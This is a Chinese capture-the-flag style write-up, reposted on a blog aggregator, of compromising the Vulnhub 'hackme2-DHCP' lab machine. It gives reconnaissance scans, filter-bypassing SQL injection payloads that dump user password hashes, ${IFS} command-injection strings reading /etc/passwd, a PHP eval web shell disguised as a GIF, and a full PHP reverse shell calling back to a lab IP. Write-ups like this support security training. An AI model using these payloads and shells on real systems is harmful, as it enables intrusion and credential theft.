热门标签
热门文章
- 110个开源且优秀的后台管理系统UI面板
- 2vscode中函数折叠和展开 快捷键(最新最正确)_vscode tsx文件展开方法
- 3jq用到的插件整理_jquery.superslide.2.1.1.min.js
- 4【Vue】Vue 使用 Print.js 打印选中区域的html,用到的是Element ui table表格,解决页面样式不出现或者table表格样式错乱问题!!!_vue element print-js
- 5GraspNet:一种用于低功耗器件抓取实时检测的高效卷积神经网络
- 6贝叶斯优化LSTM超参数_lstm超参数优化
- 7黑马程序员最新Python教程——第一阶段(3)第二阶段(1)_黑马程序员课件 python
- 8WPF学习之绘图和动画_shader effects buildtask and templates
- 9Qt 学习之路:QML 基本元素
- 10tfrecord原理详解 手把手教生成tfrecord文件与解析tfrecord文件
当前位置: article > 正文
vulnhub----hackme2-DHCP靶机
作者:繁依Fanyi0 | 2024-02-27 06:47:43
赞
踩
vulnhub----hackme2-DHCP靶机
一,信息收集
1.网段探测
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 192.168.163.28
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.163.152 d2:a6:97:bb:46:9d (Unknown: locally administered)
192.168.163.193 00:0c:29:01:34:57 VMware, Inc.
192.168.163.209 7c:b5:66:a5:f0:a5 Intel Corporate
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 1.946 seconds (131.55 hosts/sec). 3 responded
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
2.端口扫描
┌──(root㉿kali)-[~]
└─# nmap -Pn 192.168.163.193
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-26 00:43 EST
Nmap scan report for 192.168.163.193
Host is up (0.00056s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:01:34:57 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
┌──(root㉿kali)-[~] └─# nmap -sV -sC -p- 192.168.163.193 Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-26 00:43 EST Nmap scan report for 192.168.163.193 Host is up (0.0012s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 6ba824d6092fc99a8eabbc6e7d4eb9ad (RSA) | 256 abe84f5338062c6af392e3974a0e3ed1 (ECDSA) |_ 256 327690b87dfca4326310cd676149d6c4 (ED25519) 80/tcp open http Apache httpd 2.4.34 ((Ubuntu)) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). |_http-server-header: Apache/2.4.34 (Ubuntu) MAC Address: 00:0C:29:01:34:57 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.60 seconds
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
3.目录扫描
┌──(root㉿kali)-[~] └─# dirsearch -u "http://192.168.163.193" -x 403,404,500 _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 Wordlist size: 11460 Output File: /root/reports/http_192.168.163.193/_24-02-26_00-44-22.txt Target: http://192.168.163.193/ [00:44:22] Starting: [00:44:41] 200 - 0B - /config.php [00:44:51] 200 - 527B - /login.php [00:44:52] 302 - 0B - /logout.php -> login.php [00:45:01] 200 - 594B - /register.php [00:45:09] 301 - 320B - /uploads -> http://192.168.163.193/uploads/ Task Completed
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
┌──(root㉿kali)-[~] └─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u "http://192.168.163.193" =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.163.193 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /uploads (Status: 301) [Size: 320] [--> http://192.168.163.193/uploads/] /server-status (Status: 403) [Size: 303] Progress: 220560 / 220561 (100.00%) =============================================================== Finished
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
二,信息分析
访问http://192.168.163.193/login.php,是一个登陆页面,弱密码进不去
通过目录扫描,访问扫http://192.168.163.193//register.php,是一个注册页面,注册账号登陆试试
登陆后,发现是一个查询的页面,猜测有sql注入,不输入任何数据,出现表单
三,sql注入
我是用抓包形式,进行sql注入,个人认为比较方便
1.判断SQL注入
在OSINT后加一个',页面不显示,任何东西,说明有sql注入
在查显示位,猜测有空格过滤
2.查询显示位
空格过滤
/**/
- 1
- 2
3.查询注入点
search=-OSINT'/**/union/**/select/**/1,2,3#
4.查询库
search=-OSINT'/**/union/**/select/**/1,2,database()#
5.查询表
search=OSINT'/**/union/**/select/**/group_concat(table_name),2,3/**/from/**/information_schema.tables/**/where/**/table_schema='webapphacking'#
6.查字段
OSINT'/**/union/**/select/**/group_concat(column_name),2,3/**/from/**/information_schema.columns/**/where/**/table_name='users'#
7. 查user表中的值
search=OSINT'/**/union/**/select/**/group_concat(user,":",pasword),2,3/**/from/**/users#
user1:5d41402abc4b2a76b9719d911017c592,
user2:6269c4f71a55b24bad0f0267d9be5508,
user3:0f359740bd1cda994f8b55330c86d845,
test:05a671c66aefea124cc08b76ea6d30bb,
superadmin:2386acb2cf356944177746fc92523983,
test1:05a671c66aefea124cc08b76ea6d30bb,
admin:e64b78fc3bc91bcbc7dc232ba8ec59e0,
asd:e64b78fc3bc91bcbc7dc232ba8ec59e0
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
superadmin/Uncrackable
- 1
8.登陆superadmin用户
四,漏洞利用
文件上传
白名单
命令执行
在last name中,发现执行点
空格过滤
system('cat${IFS}/etc/passwd')
system('cat$IFS$1/etc/passwd')
- 1
- 2
- 3
查看uploads目录,因为uploads只能上传图片格式的文件,所有我们上传恶意的图片,然后通过命令执行更改后缀名
system('ls${IFS}-al${IFS}/var/www/html/uploads')
- 1
year2020这个是上传的目录
system('ls${IFS}-al${IFS}/var/www/html/uploads/year2020')
- 1
- 2
上传恶意的图片
GIF89a
<?php @eval($_POST['c']);?>
- 1
- 2
- 3
- 4
修改后缀
system('mv${IFS}/var/www/html/uploads/year2020/1.jpg${IFS}/var/www/html/uploads/year2020/1.php')
执行成功后,查看
- 1
- 2
- 3
访问
http://192.168.163.193/uploads/year2020/1.php
- 1
- 2
蚁剑连接
五,反弹shell
1.上传php木马文件
<?php // php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php // Copyright (C) 2007 pentestmonkey@pentestmonkey.net set_time_limit (0); $VERSION = "1.0"; $ip = '192.168.163.209'; $port = 6666; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/bash -i'; $daemon = 0; $debug = 0; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); // Parent exits } if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); // Open reverse connection $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } ?>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
- 100
- 101
- 102
- 103
- 104
- 105
- 106
- 107
- 108
- 109
- 110
- 111
- 112
- 113
- 114
- 115
- 116
2.本地监听
六,提权
呃,这个提权。。。。。。。。。。。
在legacy目录下有一个可执行文件,直接执行,就是root权限
- 1
- 2
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/150827
推荐阅读
相关标签
